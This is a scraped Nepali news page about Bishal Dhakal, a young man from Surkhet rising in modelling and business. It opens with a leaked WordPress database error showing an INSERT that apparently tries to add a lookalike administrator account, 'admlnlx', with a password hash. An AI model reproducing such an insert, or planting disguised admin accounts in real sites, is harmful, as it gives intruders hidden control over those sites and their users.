WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAwrEvVUrULlvNXg1xAn99QqwUOdH3/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 07:25:13', '', 'admlnlx', 'admlnlx')
दिपेश आचार्य,पुस ९-
सुर्खेतका युवा बिशाल ढकाल मोडलिड़्को क्षेत्रमा जम्दै गएका छन् ।दैलेख जिल्ला तोलि गाबिसमा जन्मेर सुर्खेतको बिरेन्द्नगर १९ मा बिगत २६ बर्ष देखि वस्दै आएका बिशाल मोडलिड़मा जम्न थालेका छन् ।
मोडलिड़ संगै उनि व्यवसायमा पनि जमेका छन् । उनले खेलेको भिडियो स्रोता दर्शकले निकै मन पराएका छन् ।आगामी दिनमा पनि यस क्षेत्रमा निरन्तर काम गर्ने उनले वताए ।